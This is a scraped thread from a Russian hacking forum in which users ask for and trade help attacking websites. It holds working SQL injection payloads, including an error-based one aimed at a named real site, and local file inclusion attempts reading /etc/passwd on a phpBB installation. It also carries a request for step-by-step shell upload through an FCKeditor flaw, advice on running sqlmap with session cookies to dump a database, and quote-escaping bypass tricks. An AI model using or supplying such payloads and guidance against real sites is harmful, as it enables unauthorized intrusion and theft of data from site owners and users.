Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    server.com/index.php?id=1'+order+by+100--+1
     
    _________________________
  2. chado

    chado New Member

    Joined:
    17 Sep 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    server.com/index.php?id=-1'+OR+`ID`+=+'202
    выдает правильную страницу (SELECT * FROM `Films` WHERE `ID` = '-1' OR `ID`='202' LIMIT 1), на нем и тестирую:

    server.com/index.php?id=-1'+OR+`ID`+=+'202';%00
    показывает правильную страницу (ID = 202) без ошибок. Я так понимаю комментирование работает?

    В чистом виде выдает:
    DB ERROR: Unknown column '100' in 'order clause'
    SELECT * FROM `Films` WHERE `ID` = '202' order by 100-- 1' LIMIT 1

    c order+by+1 до order+by+9
    выдает правильную страницу.

    Как засунуть туда union select, если при слове select страница отваливается по timeout? Пробовал и в разных регистрах, и со скобками - не работает. Может есть другие запросы для "побаловаться" с базой?
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    http://www.aquaprima.ru/article_show.php?art_id=199+order+by+1+--+ Невозможно подобрать кол-во столбцов.
     
  4. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    http://www.aquaprima.ru/article_show.php?art_id=199+or+1+group+by+concat%28%28select+version%28%29%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
     
  5. sfinxs15

    sfinxs15 Banned

    Joined:
    16 May 2013
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    есть уязвимость FCK editor Arbitary File upload но когда открываю страницу на которой уязвимост там ничего нету. А Acunetix пишет что загрузил тестовый текст . Можете плз пошагово написать как залить шелл? :)
     
  6. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    ссылку пошлите
     
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Может вам эта тема поможет разобраться https://forum.antichat.ru/threadnav314734-1-10-fckeditor.html
     
    _________________________
  8. ishenko

    ishenko New Member

    Joined:
    18 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте.
    Вроде локал инклуд но не могу проинклудить...

    Запрос
    &language=ru"
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/ru"/common.php) [user.include]: failed to open stream: No such file or directory
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/ru"/common.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')
    Language file ./language/ru"/common.php couldn't be opened.

    language=ru../../../../../etc/passwd%00
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/passwd) [user.include]: failed to open stream: No such file or directory
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/passwd' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')
    Language file ./language/passwd/common.php couldn't be opened.

    language=ru../../../../../etc/passwd////кучу слешей/////
    чистая страниц

    language=ru../../../etc/passwd/%00
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include(./language/) [user.include]: failed to open stream: Success
    [phpBB Debug] PHP Notice: in file /includes/session.php on line 1637: user::include() [function.include]: Failed opening './language/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear')
    Language file ./language//common.php couldn't be opened.

    вывести не выходит не как...
    помогите советом!
    или тут не чего не зделаеш?


    и еще вопрос -есть скуль инжект на сайте но надо авторизоваться чтобы его использовать .есть ли прога, скрипт которая логинится к сайту и потом дампит базу используя скуль инжект ? руками долго очень перебирать база большеватая)
     
    #22728 ishenko, 14 Nov 2013
    Last edited: 14 Nov 2013
  9. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    ishenko

    просто авторизируйся на сайте, залезь в настройки кукисов и посмотри, что там сайт установил.

    потом используй их в SQLMAP параметр --cookie="тут через ; записываются куки"

    теперь можешь крутить как авторизированный пользователь
     
  10. ishenko

    ishenko New Member

    Joined:
    18 Aug 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    спасибо!! работает.
    а по другому вопросу не ответите пожалуйста локал инклуд или не чего не сделаеш?
     
  11. -=Cerberus=-

    -=Cerberus=- κρυπτός γράφω

    Joined:
    29 Apr 2012
    Messages:
    1,321
    Likes Received:
    930
    Reputations:
    391
    Почитай ТУТ хорошая подробная статья.
     
  12. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    есть уязвимый на скулю скрипт, типа такого


    $login = $_GET['login'];
    SELECT id, user_name FROM users WHERE user_login = '$login'

    ковычки слешируются, как составить любой запрос на выборку данных?
     
  13. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    ____
     
  14. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    ну также как бы будет ошибка и ничего не выведет
     
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Соглашусь, ибо потестировал!
    Тебе необходимо еще одно поле (с помощью слэшей коментируется часть запроса).
    Например:
     
  16. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Можно так-же попробовать двойным url енкодингом попробовать пронести кавычку, но это очень сомнительно, но всё-же..)
     
  17. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    при попытке into outfile выскакиевает ошибка "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error". При повторном запросе того же самого запроса с тем же путем и тем же файлом, пишет "CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[HY000]: General error: 1086 File ', home=>www, pp2.txt' already exists</p>. Файл в итоге этот все равно не создается, и несуществует (не инклудится). Пробовал разные папки и разные имена файлов. file_priv Y.
    Разжуйте пожайлуста что ему ненравится тут, и что можно сделать. Спасибо
     
  18. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    PHP:
    $login="\' union select 1,2-- ";
    после слеширования кавычек получается

    PHP:
    $login="\\' union select 1,2-- ";
    \\ - экранированный обратный слеш.

    ----


    Возможно дело в правах выставляемых на файл. То есть он создаётся, но тот от кого выполняется процесс php прочитать его не может. Может быть дело в правах на папке, пробовал /tmp? Если нет то попробуй там создать.
     
    #22738 Ganz Euler, 15 Nov 2013
    Last edited: 15 Nov 2013
  19. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    В итоге запрос будет выглядеть вот так:
    SELECT id, user_name FROM users WHERE user_login = '\' union select 1,2--'
    Т.е запись \' union select 1,2-- - обычный текст (логин).
     
  20. Ganz Euler

    Ganz Euler Member

    Joined:
    7 Oct 2013
    Messages:
    50
    Likes Received:
    13
    Reputations:
    10
    Неправильно написал я немного, но по сути верно всё.

    PHP:
    <?php
    $login
    ="\' union select 1,2-- ";  //$_GET['login']
    $login str_replace("'""\'"$login);
    echo 
    $login//sql_query...
    ?>
    Code:
    sergey@notebook $ php test.php 
    \\' union select 1,2-- 
    Т.е. запрос SELECT id, user_name FROM users WHERE user_login = '\\' union select 1,2-- '

    С точки зрения PHP правильно было бы написать мне тогда
    PHP:
    $login="\\\\' union select 1,2-- ";
    , я же написал значение переменной по факту.
     
    2 people like this.
Thread Status:
Not open for further replies.